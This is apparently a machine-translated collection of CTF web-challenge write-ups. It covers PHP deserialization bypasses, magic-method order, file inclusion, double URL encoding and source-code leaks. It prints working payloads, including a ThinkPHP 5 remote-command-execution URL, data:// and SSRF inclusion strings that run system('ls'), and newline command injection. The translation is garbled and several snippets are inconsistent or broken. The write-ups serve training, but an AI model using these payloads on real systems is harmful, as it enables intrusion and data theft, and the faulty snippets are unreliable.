The simplest deserialization vulnerability

Simple example , Here is a list of simple PHP Code ,index.php It contains flag.php This file

<?php
//  Turn off error reporting 
error_reporting(0);
include "flag.php";
$key="020202";
$str=$_GET['str'];
if(unserialize($str)==="$key"){
    
    echo "$flag";
}
show_source(__FILE__); 
//show_source()  Function to highlight the syntax of the file .
?>

flag.php The contents of the document are as follows

<?php
$flag="flag{020202020020}"    
?>

Logical explanation ： When passed URL Pass parameters to str variable , If the passed variable Deserialization Come out with "$key" identical （ Three equal signs ）, Then output flag.php Inside flag Parameter contents , So it can be URL Input in ：

http://127.0.0.1/web/serialize/index.php?str=s:6:"22020202";

It's not sure what form the serialized string is , You can try it in online tools

<?php
$key=020202;
echo serialize($key);
?>
// i:8322;

Trap question PHP Deserialization vulnerability

The following is a trap of deserialization vulnerability CTF subject

<?php
error_reporting(0);
//  Hide the error content 
include("flag.php");
$cookie=$_COOKIE['Bob'];
if(isset($_GET['hint'])){
    
    show_source(__FILE__);
}elseif(unserialize($cookie)==="$key"){
    
	echo "$flag";
}else{
    
    $key="123456";
}
?>

You can see that from the code , Code acquisition Bob Of cookie Content , Then with key Compare elements , If the contents are the same after deserialization , The output flag, But there are two pitfalls ：

• In infiltration , Only the input ?hint= Will show the source code , The following content will not be implemented , namely hint Only when the value exists will the source code be displayed , But once you show the source code , The following content will not be executed
• Trap of code execution sequence ,key The value of is only in else It will be assigned under , So before and cookie The compared value is null

According to the content , The correct solution of this problem is modified cookie Content ：

Cookie: Bob=s:0:"";

PHP Magic method execution sequence

Magic method link

__construct(), Class constructor 

__destruct(), Destructor of class 

__call(), Called when an invocable method is invoked in an object 

__callStatic(), Call in an static way when an invocable method is called 

__get(), Call when you get a member variable of a class 

__set(), Called when setting a member variable of a class 

__isset(), When called on an inaccessible property isset() or empty() Called when the 

__unset(), When called on an inaccessible property unset() When called .

__sleep(), perform serialize() when , This function will be called first 

__wakeup(), perform unserialize() when , This function will be called first 

__toString(), The response method when a class is treated as a string 

__invoke(), The response method when an object is called by calling a function 

__set_state(), call var_export() When exporting a class , This static method will be called .

__clone(), Called when the object copy is complete 

__autoload(), Trying to load an undefined class 

__debugInfo(), Print the required debug information 

 Example 

For example, the following code execution sequence

<?php
error_reporting(0);

class ABC{
    
    public $test;
    function __construct(){
    
        $test=1;
        echo " The constructor is called <br>";
    }
    function __destruct(){
    
        echo " Destructor called <br>";
    }
    function __wakeup(){
    
        echo " The wake-up function was called <br>";
    }
}
echo " Create objects a<br>";
$a=new ABC();
echo " serialize <br>";
$a_ser=serialize($a);
echo " Deserialization <br>";
$a_unser=unserialize($a_ser);
echo " The object is dying ";

//  Create objects a
//  The constructor is called 
//  serialize 
//  Deserialization 
//  The wake-up function was called 
//  The object is dying and the destructor is called 
//  Destructor called 

CTFHub-2020 WANGDING cup AreUSerialz

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {
    

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
    
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
    
        if($this->op == "1") {
    
            $this->write();
        } else if($this->op == "2") {
    
            $res = $this->read();
            $this->output($res);
        } else {
    
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
    
        if(isset($this->filename) && isset($this->content)) {
    
            if(strlen((string)$this->content) > 100) {
    
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
    
            $this->output("Failed!");
        }
    }

    private function read() {
    
        $res = "";
        if(isset($this->filename)) {
    
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
    
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
    
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{
    'str'})) {
    

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
    
        $obj = unserialize($str);
    }

}

Code logic ：

1. Pass in the parameter str, Convert it to string type , Judge whether it is ASCII stay 32 To 125 Content between
2. Deserialization str Parameters Before , Automatically call __wakeup() Magic methods
3. Call destructor __destruct() If op Parameter is “2”, Is automatically converted to “1”, take content Convert to “”, And call process() function
4. stay process() Function to determine op To determine the reading and writing , That is, read and output flag.php The value in

How to solve the problem ：

1. There is a deserialization function unserialize(), It means that you need to pass in serialization parameters

2. There is a filter in the destructor , You can use === and == To bypass the differences

3. You need to be familiar with the calling sequence of magic functions , namely __wakeup() -> unserialize() -> __destruct()

4. Execute code ：

   <?php
   
   class FileHandler{
         
       protected $op=' 2'; // Bypass detection 
       protected $filename="flag.php";
       protected $content="yzp";
   }
   $flag=new FileHandler();
   $flag_1=serialize($flag);
   echo $flag_1;
   ?>
   

   Get the serialized string

   O:11:"FileHandler":3:{
         s:2:"op";s:2:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:3:"yzp";}
   

   Last in URL Upload the parameters

summary ：

The comparison of strong and weak types is a bypass PHP The method of detection ,== Only compare values, not types ,=== Yes, the type and value must be the same

Besides , The calling sequence of magic methods needs to be carefully mastered

Attack and defend the world ：unserialize3 title

Original title

Problem solving ：

• Pass for reference code
• If magic method __wakeup() Being called will cause the program to exit

The key ：

• Calling the deserialization magic method __unserialize() It will call __wakeup() Magic methods
• Wrong serialization code can prevent __wakeup() Call to

Generate serialization code

<?php 
class xctf{
    
	public $flag='111';
}
$flag=new xctf;
$str=serialize($flag);
echo $str;
?>

O:4:"xctf":1:{
    s:4:"flag";s:3:"111";}  

Just change the number , Wrong serialization is ok , such as ：

O:4:"xctf":2:{
    s:4:"flag";s:3:"111";}  

flag Can generate

Attack and defend the world ：PHP2

Search by directory violence , eureka index.phps file , The title of the content is source code
title

The key ：

• The browser will do it by itself URL The decoding
• Then the code will proceed URL decode
• So it takes two times URL encode

?id=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65

Attack and defend the world ：favorite_number

Topic analysis ：

The key ：

• Array overflow vulnerability ： At this time, the structure 4294967296 That is to say 0, In other words, it can be considered that stuff[0]=stuff[4294967296], So bypassing the first layer of filtering can be ：stuff[4294967296]=admin&stuff[1]=user
• m It represents multi line matching , therefore , As long as the first line matches successfully , The subsequent content will no longer match %0a It is carriage return transcoding , So you can pass parameters ` num=6666%0a ls
• The last layer of filtering is to prevent malicious code , But you can use inode Code ,ls -i /tac `find / -inum [inode Code ]`

Naturally, there are other ways , Baidu

Attack and defend the world ：Web_php_unserialize

title

The key to solving the problem is ：

• Regular expression filtering , have access to O:+4:"Demo" Instead of O:4:"Demo".
• base64 Decoding of means that the incoming data must be base64 code
• Not allow __wakeup() The execution method of magic method is the serialization of incoming errors , such as O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}

Pit point （ Baidu ）：
there file Variables are private variables , So after serialization There is a blank character at the beginning and end of the string （ namely %00）, The string length is also larger than the actual length 2, If the serialization result is copied to the online base64 If you encode your website, you may lose white space characters , So it's directly in here php Code in the code . Similar to that protected Variable of type , After serialization, the first part of the string will be added %00*%00

Generation script

<?php 
class Demo{
    
	private $file='fl4g.php';
}
$f=new Demo();
$b=serialize($f);
$b=str_replace('O:4', 'O:+4', $b)
$b=str_replace('1:{','2:{',$b)
echo base64_encode($b)
?>

Attack and defend the world ：php_rce

Problem solving ：

• Use dirsearch And the sword , Sweep it out robots.txt , But there is nothing critical in the content
• Baidu ThinkPHPV5 Loopholes in the framework , A remote command execution vulnerability is found payload have access to ：http://your-ip:8080?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[your-cmd]

Infiltration process ：

Attack and defend the world ：Web_php_include

The key to solving the problem is ：

• Out of commission php:// Pseudo protocol penetration
• find flag File contains

solution 1：SSRF+ File contains

• page Parameters will contain values , Because of the problem of authority , We can't direct to hello Pass parameters and execute PHP Code
• Give Way page contain http://127.0.0.1/index.php
• Pass parameters hello=<?system('ls');?>( No <?php ?>) Search for flag file
• Last read flag file

payload

http://your-ip:8080?page=http://127.0.0.1/index.php?hello=<?system('ls');?>
http://your-ip:8080?page=http://127.0.0.1/index.php?hello=<?show_source('fl4gisisish3r3.php');?>

solution 2：PHP Fake protocol data://text/plain
Output the current directory path

http://111.200.241.244:58702/?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT'];?>

Output the contents of the current directory file ：

http://111.200.241.244:58702/?page=data://text/plain,<?php print_r(scandir('/var/www'));?>

Output source code

http://111.200.241.244:58702/?page=data://text/plain,<?php show_source('fl4gisisish3r3.php');?>

You can also use base64 In the form of ,+ Number to use URL Code to %2b

http://111.200.241.244:58702/?page=data://text/plain;base64,PD9waHAgc2hvd19zb3VyY2UoJ2ZsNGdpc2lzaXNoM3IzLnBocCcpOz8%2b

CTFHub： The source code of the website is leaked

Use script to crack ：

import requests
url="http://challenge-7e05b5df83247052.sandbox.ctfhub.com:10800"
frist=['web','website','backup','back','www','wwwroot','temp']
secound=['.tar','.tar.gz','.zip','.rar']
for i in frist:
	for j in secound:
		url_test=url+"/"+i+j
		print(url_test)
		r=requests.get(url_test)
		r.encoding='utf-8'
		get_file=r.text
		if '404' not in get_file:
			print(get_file)

CTFHub：vim Cache leaks

such as index.php Use vim There will be left when .index.php.swp Postfix file ( There's a point in front )
Restore cache file ：

vim -r index.php.swp

CTFHub：.DS_Store Let the cat out of the

.DS_Store yes Mac OS A hidden file that saves the custom properties of a folder . adopt .DS_Store You can know everything in this directory List of documents .
Usage method ： stay Linux Directly inside cat
Tools ：ds_store_exp https://github.com/lijiejie/ds_store_exp

Recursively generate files ,python2